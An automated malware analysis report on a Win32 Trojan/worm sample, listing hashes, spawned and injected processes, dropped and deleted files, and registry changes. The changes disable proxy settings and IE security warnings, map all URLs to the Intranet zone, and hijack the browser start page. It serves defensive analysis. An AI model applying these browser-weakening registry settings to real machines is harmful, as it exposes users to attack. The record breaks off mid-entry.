HEUR:Trojan.Win32.Invader (Kaspersky), Gen:Variant.Graftor.94620 (AdAware), WormAutoItGen.YR, GenericInjector.YR (Lavasoft MAS)Behaviour: Trojan, Worm
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: 30ebd5248bf939f8574924d0cd76a554
SHA1: 2a3cadbb1580d6e49fbc1486af7f7575ee902152
SHA256: 801921336350618643de072464dd29f0f46bf2ba49535cd2d7a806dda9070af2
SSDeep: 24576:/NBI/KyLqpALIYXjEAI8LDrrAJEWXR17lP3Dk:o9qpwIYTEs EUvlvg
Size: 1049992 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2013-12-01 10:08:23
Analyzed on: WindowsXP SP3 32-bit
Summary: Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).
Dynamic Analysis
Payload
No specific payload has been found.
Process activity
The Trojan creates the following process(es):
nvsvc32.exe:2604
MainPro.exe:604
desk.exe:3840
ndis500.exe:2464
ping.exe:496
ping.exe:1388
YP.exe:1236
ndsqp.exe:2428
%original file name%.exe:1532
lgsoyx.exe:3824
shock.exe:3848
The Trojan injects its code into the following process(es):
MainProX.exe:600
Explorer.EXE:880
Mutexes
The following mutexes were created/opened:No objects were found.
File activity
The process nvsvc32.exe:2604 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%System%\clk.ini (82 bytes)
%WinDir%\run.bat (196 bytes)
%WinDir%\c4ud.dll (1753 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Cookies\Current_User@ssl.bing[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@money.ca.msn[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@abmr[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@msnportal.112.2o7[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@kaspersky[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@www.msn[2].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@aaa[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@bing[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@twitter[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@auto.search.msn[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@microsoft[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@hit.gemius[2].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@c.msn[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@rambler[2].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@pass.yandex[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@atdmt[2].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@kaspersky.122.2o7[2].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@c.ca.msn[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@doubleclick[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@adnxs[2].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@hm.baidu[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@adgear[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@c.atdmt[2].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@yandex[3].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@msn[2].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@yandex[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@www.bing[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@tns-counter[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@scorecardresearch[2].txt (0 bytes)
The process MainPro.exe:604 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KHIRGNID\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SXUVKHUF\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\EL03V57J\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O6JANU0T\desktop.ini (67 bytes)
The process desk.exe:3840 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SXUVKHUF\190[1].ico (5930 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\EL03V57J\178[1].ico (3595 bytes)
%WinDir%\Ymb\deskico\cfg.ini (275 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O6JANU0T\184[1].ico (6341 bytes)
%Documents and Settings%\%current user%\Desktop\»ð±¬ÓÎ÷.lnk (1 bytes)
%Documents and Settings%\%current user%\Desktop\ÆåÅÆ´óÌü.lnk (1 bytes)
%WinDir%\Ymb\deskico\184.ico (5882 bytes)
%WinDir%\Ymb\deskico\178.ico (2390 bytes)
%Documents and Settings%\%current user%\Desktop\´«Ææ°Ãâ€ÂÒµ.lnk (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KHIRGNID\cfg[1].ini (275 bytes)
%WinDir%\Ymb\deskico\190.ico (5882 bytes)
The process ndis500.exe:2464 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%System%\drivers\uniconfi.dat (4447 bytes)
%WinDir%\Ymb\sys32\ndisweb.log (491 bytes)
%System%\drivers\ZWebNds.sys (16 bytes)
%WinDir%\Ymb\sys32\ndisweb_new.dat1 (180 bytes)
%WinDir%\Ymb\sys32\ndisweb_new.dat0 (8 bytes)
The Trojan deletes the following file(s):
%WinDir%\Ymb\sys32\ndisweb_new.dat0 (0 bytes)
%WinDir%\Ymb\sys32\ndisweb_new.dat1 (0 bytes)
%System%\drivers\uniconfi.dat (0 bytes)
The process YP.exe:1236 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\Ymb\sys32\shock.exe (1493 bytes)
%System%\tl.dat (8 bytes)
%System%\bc.dat (1784 bytes)
%System%\tl.txt (388 bytes)
%System%\safe.dat (3780 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\hfftcbc.txt (601 bytes)
%WinDir%\Ymb\sys32\shock.txt (36452 bytes)
%WinDir%\Ymb\sys32\ndis500.txt (43108 bytes)
%WinDir%\Ymb\sys32\tray.txt (144098 bytes)
%WinDir%\Ymb\wow64\nvsvc32.txt (132327 bytes)
%WinDir%\Ymb\wow64\nvsvc32.exe (7715 bytes)
%WinDir%\Ymb\sys32\ndis500.exe (250 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\vcnpoku.txt (1425 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\suqpotb.txt (2321 bytes)
%System%\bc.txt (85868 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\qxoxvnm.txt (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ognbetd.txt (7345 bytes)
%WinDir%\Ymb\sys32\ndsqp.exe (75 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\sgotxct.txt (7547 bytes)
%WinDir%\Ymb\sys32\urlnav.txt (14076 bytes)
%WinDir%\Ymb\First.txt (18796 bytes)
%WinDir%\Ymb\sys32\ndsqp.txt (12588 bytes)
%WinDir%\Ymb\sys32\urlnav.dll (83 bytes)
%WinDir%\Ymb\lgsoyx.exe (110 bytes)
%WinDir%\Ymb\deskico\desk.exe (299 bytes)
%WinDir%\Ymb\deskico\desk.txt (50796 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\mopdaqf.txt (4545 bytes)
%System%\safe.txt (122772 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\tmifumt.txt (2105 bytes)
%WinDir%\Ymb\flist.bin (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\gktmoij.txt (11 bytes)
%System%\drivers\HideSys.sys (15 bytes)
%System%\appmon.txt (63836 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\wohbhrb.txt (673 bytes)
The process ndsqp.exe:2428 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%System%\drivers\uniconfi.dat (8 bytes)
%WinDir%\Ymb\sys32\ndisweb.log (142 bytes)
%System%\drivers\ZWebNds.sys (16 bytes)
%WinDir%\Ymb\sys32\ndisweb_new.dat1 (5 bytes)
%WinDir%\Ymb\sys32\ndisweb_new.dat0 (8 bytes)
The Trojan deletes the following file(s):
%WinDir%\ax01.da0 (0 bytes)
%System%\drivers\ZWebNds.sys (0 bytes)
%WinDir%\Ymb\sys32\ndisweb_new.dat1 (0 bytes)
%WinDir%\Ymb\sys32\ndisweb_new.dat0 (0 bytes)
The process %original file name%.exe:1532 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\jwxf\start.bat (99 bytes)
%WinDir%\jwxf\yp.exe (5033 bytes)
%WinDir%\jwxf\MainProX.exe (1660 bytes)
%WinDir%\jwxf\userip.ipb (936 bytes)
%WinDir%\jwxf\MainPro.exe (18513 bytes)
The Trojan deletes the following file(s):
%WinDir%\jwxf\__tmp_rar_sfx_access_check_1215828 (0 bytes)
The process shock.exe:3848 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\Ymb\sys32\shock.dll (931 bytes)
Registry activity
The process nvsvc32.exe:2604 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "EE 88 7E 8E 2A B1 89 90 B7 C0 10 E6 23 84 4F E4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKCU\Software\Microsoft\Internet Explorer\Main]
"TabProcGrowth" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer\Control Panel]
"DisableDeleteBrowsingHistory" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
The Trojan deletes the following registry key(s):
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Extensions\{e2e2dd38-d088-4134-82b7-f2ba38496583}]
The process MainPro.exe:604 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E2 24 91 72 F9 3D AC 19 17 17 80 C6 18 67 0D C1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
The Trojan deletes the following value(s) in system registry:
The Trojan disables automatic startup of the application by deleting the following autorun value:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"MicroAvd"
The process desk.exe:3840 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"WarnOnZoneCrossing" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"WarnOnHTTPSToHTTPRedirect" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1E 00 00 00 01 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F0 01 C7 41 95 5F 3E 03 36 3C 0D 64 27 3F F0 C6"
[HKCR\DeskIcon]
"(Default)" = "1000_7959"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process ndis500.exe:2464 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "26 A6 E3 93 65 77 35 D2 A6 8E A8 2A E5 06 0A C2"
The process ping.exe:496 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "CF 82 14 14 8F 43 3B 31 DE 58 30 AF E3 CC B3 C0"
The process ping.exe:1388 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "76 9C 96 6D E4 F8 59 78 F8 EB 6F 6C E8 DE 81 11"
The process MainProX.exe:600 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "9D 42 B8 19 EF A9 FA C9 A6 20 CC 25 93 DB D2 01"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Internet Explorer\Main]
"Start Page" = "http://123.sogou.com/?71084-9278"
"Search Page" = "http://123.sogou.com/?71084-9278"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Main]
"Start Page" = "http://123.sogou.com/?71084-9278"
"Search Page" = "http://123.sogou.com/?71084-9278"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Internet Explorer\Main]
"Default_Page_URL" = "http://123.sogou.com/?71084-9278"
The process YP.exe:1236 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "AC E8 51 1F 1F 3F 45 A4 EF C9 06 73 8A B3 2A 77"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
The process ndsqp.exe:2428 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "4F 54 F1 DA CF 13 32 D6 ED 49 8C E8 4F 5A 90 B6"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
The Trojan deletes the following registry key(s):
[HKLM\System\CurrentControlSet\Services\ZWebNds\Enum]
[HKLM\System\CurrentControlSet\Services\ZWebNds\Security]
[HKLM\System\CurrentControlSet\Services\ZWebNds]
The process %original file name%.exe:1532 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "45 6A 4E 88 BE 58 91 12 29 00 09 17 5E BD C9 B7"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\WinRAR SFX]
"c%%windows%jwxf" = "c:\windows\jwxf"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\c:\windows\jwxf]
"start.bat" = "start"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
The process lgsoyx.exe:3824 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
